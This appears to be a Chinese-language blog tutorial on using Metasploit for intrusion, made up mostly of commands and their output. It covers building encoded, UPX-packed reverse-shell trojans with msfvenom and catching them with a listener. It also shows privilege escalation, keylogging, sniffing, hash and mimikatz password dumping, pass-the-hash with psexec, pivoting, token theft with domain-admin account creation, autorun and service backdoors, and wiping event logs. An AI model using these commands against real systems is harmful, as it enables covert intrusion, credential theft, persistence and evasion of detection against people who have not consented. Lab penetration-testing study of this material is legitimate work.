渗透工具之msf

简介

它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

环境

工具:msf4

伪装木马

原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

构造shellcode常用命令

msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f c msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f python

常用命令

查看帮助

msfvenom -h
这里写图片描述

查看一个Payload具体需要什么参数?

msfvenom -p windows/meterpreter/bind_tcp --payload-options
这里写图片描述

自己本地生成的bind_tcp的payload并不能在Windows机子上运行 (提示不是可用的Win32程序;如果大家也有遇到这种错误的话,推荐用msfvenom生成c的shellcode 然后自己编译为exe后运行。使用msfvenom –list可以查看所有的payload encoder nops。

设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.152,端口设置成443.所以最后连接会通向192.168.1.152的443端口。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.152 LPORT=443 -f exe > c.exe
这里写图片描述

参数说明:

-p payload-e 编码方式-i 编码次数-b 在生成的程序中避免出现的值LHOST,LPORT 监听上线的主机IP和端口-f exe 生成EXE格式

upx加壳

说明:upx只是压缩壳工具;如果需要增大破解难度,需要添加加密壳。

upx -9 c.exe
这里写图片描述

本机监听

因为之前用的是reverse_tcp,所以设置如下:

msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverset_tcp
这里写图片描述

验证

这里写图片描述

基本命令

background  # 让meterpreter处于后台模式  sessions -i number   # 与会话进行交互,number表示第n个session  quit  # 退出会话  shell # 获得命令行cat c:\\boot.ini   # 查看文件内容  getwd # 查看当前工作目录 work directory  upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上  download 0xfa.txt /root/Desktop/   # 下载文件到本机上  edit c:\\boot.ini  # 编辑文件  search -d d:\\www -f web.config # search 文件 ps # 查看当前活跃进程  migrate  pid # 将Meterpreter会话移植到进程数位pid的进程中  execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互  getpid # 获取当前进程的pid  kill pid # 杀死进程  getuid # 查看权限  sysinfo # 查看目标机系统信息,如机器名,操作系统等  getsystem #提权操作timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的创建时间

迁移进程

meterpreter > ps自行选择PIDmeterpreter > migrate pid

提权操作

getsystem 大部分都会失败 他只尝试了4个Payload。meterpreter > getuid    Server username: Testing\Croxy    meterpreter > getsystem    [-] priv_elevate_getsystem: Operation failed: Access is denied.使用MS14-058之类的Exp进行提权meterpreter > background[*] Backgrounding session 3..msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menumsf exploit(ms14_058_track_popup_menu) > set SESSION 3

获取敏感信息

run post/windows/gather/checkvm #是否虚拟机run post/windows/gather/enum_applications #获取安装软件信息run post/windows/gather/dumplinks   #获取最近的文件操作run post/windows/gather/enum_ie  #获取IE缓存run post/windows/gather/enum_chrome   #获取Chrome缓存run scraper                      #获取常见信息#保存在~/.msf4/logs/scripts/scraper/目录下

键盘记录

meterpreter > keyscan_startStarting the keystroke sniffer...meterpreter > keyscan_dumpDumping captured keystrokes...dir <Return> cd  <Ctrl>  <LCtrl>meterpreter > keyscan_stopStopping the keystroke sniffer...

网络嗅探

meterpreter > use snifferLoading extension sniffer...success.meterpreter > sniffer_interfaces    1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )    2 - 'Intel(R) PRO/1000 MT Desktop Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )    3 - 'Cisco Systems VPN Adapter' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )meterpreter > sniffer_start 2[*] Capture started on interface 2 (50000 packet buffer)meterpreter > sniffer_dump 2 /tmp/test2.cap[*] Flushing packet capture buffer for interface 2...[*] Flushed 1176 packets (443692 bytes)[*] Downloaded 100% (443692/443692)...[*] Download completed, converting to PCAP...[*] PCAP file written to /tmp/test2.cap

获取hash

meterpreter > run post/windows/gather/smart_hashdump[*] Running module against TESTING[*] Hashes will be saved to the database if one is connected.[*] Hashes will be saved in loot in JtR password file format to:[*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt[*] Dumping password hashes...[*] Running as SYSTEM extracting hashes from registry[*]     Obtaining the boot key...[*]     Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...[*]     Obtaining the user list and keys...[*]     Decrypting user keys...[*]     Dumping password hints...[+]     Croxy:"Whoareyou"[*]     Dumping password hashes...[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  [+]     HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::[+]     test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::

获取明文密码

meterpreter > getuidServer username: NT AUTHORITY\SYSTEM     meterpreter > load mimikatzLoading extension mimikatz...success.meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentials     meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================     meterpreter > mimikatz_command -f samdump::hashesOrdinateur : TestingBootKey    : 8c2c8d96e92a8ccfc407a1ca48531239     meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { Croxy ; Testing ; hehe }[1] { test ; Testing ; test }

通过hash获取权限

msf > use exploit/windows/smb/psexecmsf exploit(psexec) > show options     Module options (exploit/windows/smb/psexec):     Name       Current Setting  Required  Description----       ---------------  --------  -----------RHOST                       yes       The target addressRPORT      445              yes       Set the SMB service portSHARE      ADMIN$           yes       The share to connect to, can be an admi                                              n share (ADMIN$,C$,...) or a normal read/write folder shareSMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                                ationSMBPass                     no        The password for the specified usernameSMBUser                     no        The username to authenticate as     Exploit target:     Id  Name--  ----0   Automatic     msf exploit(psexec) > set RHOST 192.168.0.254RHOST => 192.168.0.254msf exploit(psexec) > set SMBUser isoskySMBUser => isoskymsf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537     SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537msf exploit(psexec) > exploit[*] Started reverse handler on 192.168.0.3:4444[*] Connecting to the server...[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...[*] Uploading payload...[*] Created \UGdecsam.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting \UGdecsam.exe...[*] Sending stage (749056 bytes) to 192.168.0.254[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877)

内网渗透

端口转发 (将远程主机3389端口转发到本地1234端口上)

meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54[*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80

内网代理

meterpreter > run autoroute -s 10.42.0`.54[*] Adding a route to 10.42.0.54/255.255.255.0...[+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54[*] Use the -p option to list all active routesmeterpreter > background[*] Backgrounding session 1...msf exploit(handler) > use auxiliary/server/socks4amsf auxiliary(socks4a) > show options     Module options (auxiliary/server/socks4a):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The address to listen onSRVPORT  1080             yes       The port to listen on.     Auxiliary action:Name   Description----   -----------Proxy       msf auxiliary(socks4a) > route printActive Routing Table====================Subnet             Netmask            Gateway------             -------            -------10.42.0.54         255.255.255.0      Session 1     msf auxiliary(socks4a) > ifconfig[*] exec: ifconfig     msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xxSRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx为自己运行msf的vps机子)     msf auxiliary(socks4a) > exploit[*] Auxiliary module execution completed[*] Starting the socks4a proxy server

之后使用proxychains 设置socks4代理 链接vps上的1080端口 就可以访问内网了。

SSH代理

msf > load meta_sshmsf > use multi/ssh/login_passwordmsf > set RHOST 192.168.56.3RHOST => 192.168.56.3msf > set USER testUSER => testmsf > set PASS reversePASS => reversemsf > set PAYLOAD ssh/metassh_sessionPAYLOAD => ssh/metassh_sessionmsf > exploit -z[*] Connecting to dsl@192.168.56.3:22 with password reverse[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28   03:51:16 +1300[*] Session 1 created in the background.msf > route add 192.168.57.0 255.255.255.0 1

之后就是愉快的内网扫描了。 
当然还是推荐直接用ssh -f -N -D 127.0.0.1:6666 test@103.224.81.1.1

偷取token

meterpreter>ps #查看目标机器进程,找出域控账户运行的进程IDmeterpreter>steal_token pidmeterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > load incognitoLoading extension incognito...success.meterpreter > list_tokens -u     Delegation Tokens Available========================================IIS APPPOOL\zykNT AUTHORITY\IUSRNT AUTHORITY\LOCAL SERVICENT AUTHORITY\NETWORK SERVICENT AUTHORITY\SYSTEMQLWEB\Administrator     Impersonation Tokens Available========================================NT AUTHORITY\ANONYMOUS LOGON     meterpreter > impersonate_token QLWEB\\Administrator[+] Delegation token available[+] Successfully impersonated user QLWEB\Administratormeterpreter > getuidServer username: QLWEB\Administratormeterpreter>add_user 0xfa funny –h192.168.3.98  #在域控主机上添加账户meterpreter>add_group_user “DomainAdmins” 0xfa –h192.168.3.98   #将账户添加至域管理员组

内网扫描

meterpreter > run autoroute -s 192.168.3.98meterpreter > background[*] Backgrounding session 2...msf exploit(handler) > use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306PORTS => 80,8080,21,22,3389,445,1433,3306msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24RHOSTS => 192.168.3.1/24msf auxiliary(tcp) > set THERADS 10THERADS => 10msf auxiliary(tcp) > exploit

后门

一个vbs后门,写入了开机启动项;但是容易被发现,还是需要大家发挥自己的智慧。

meterpreter > run persistence -X -i 5 -p 23333 -r 10.42.0.1[*] Running Persistance Script[*] Resource file for cleanup created at /home/croxy/.msf4/logs/persistence/TESTING_20150930.3914/TESTING_20150930.3914.rc[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333[*] Persistent agent script is 148453 bytes long[+] Persistent Script written to C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs[*] Executing script C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs[+] Agent executed with PID 4140[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulrMeterpreter服务后门meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\Users\Croxy\AppData\Local\Temp\tuIKWqmuO...[*]  >> Uploading metsrv.x86.dll...[*]  >> Uploading metsvc-server.exe...[*]  >> Uploading metsvc.exe...[*] Starting the service...* Installing service metsvc* Starting service* Service metsvc successfully installed.

之后电脑就默默生成了一个自启服务meterpreter;然后连接后门。

msf exploit(handler) > use exploit/multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcppayload => windows/metsvc_bind_tcpmsf exploit(handler) > set RHOST 10.42.0.54RHOST => 10.42.0.54msf exploit(handler) > set LPORT 31337LPORT => 31337msf exploit(handler) > exploit

清理痕迹

meterpreter > clearev[*] Wiping 12348 records from Application...[*] Wiping 1345 records from System...[*] Wiping 3 records from Security... meterpreter > timestomp

一些常用的破解模块

auxiliary/scanner/mssql/mssql_login 
auxiliary/scanner/ftp/ftp_login 
auxiliary/scanner/ssh/ssh_login 
auxiliary/scanner/telnet/telnet_login 
auxiliary/scanner/smb/smb_login 
auxiliary/scanner/mssql/mssql_login 
auxiliary/scanner/mysql/mysql_login 
auxiliary/scanner/oracle/oracle_login 
auxiliary/scanner/postgres/postgres_login 
auxiliary/scanner/vnc/vnc_login 
auxiliary/scanner/pcanywhere/pcanywhere_login 
auxiliary/scanner/snmp/snmp_login 
auxiliary/scanner/ftp/anonymous

一些好用的模块

auxiliary/admin/realvnc_41_bypass (Bypass VNCV4网上也有利用工具) 
auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版 洞略老) 
auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:)) 
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:) 
auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令 没回显:() 
auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友) 
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:) 
auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行) 
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)

一些好用的脚本

uxiliary/scanner/rsync/modules_list (Rsync) 
auxiliary/scanner/misc/redis_server (Redis) 
auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血) 
auxiliary/scanner/mongodb/mongodb_login (Mongodb) 
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch) 
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含) 
auxiliary/scanner/http/http_put (http Put) 
auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户) 
auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户) 
auxiliary/scanner/http/svn_scanner (svn Hunter) 
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破) 
auxiliary/scanner/http/zabbix_login (Zabbix )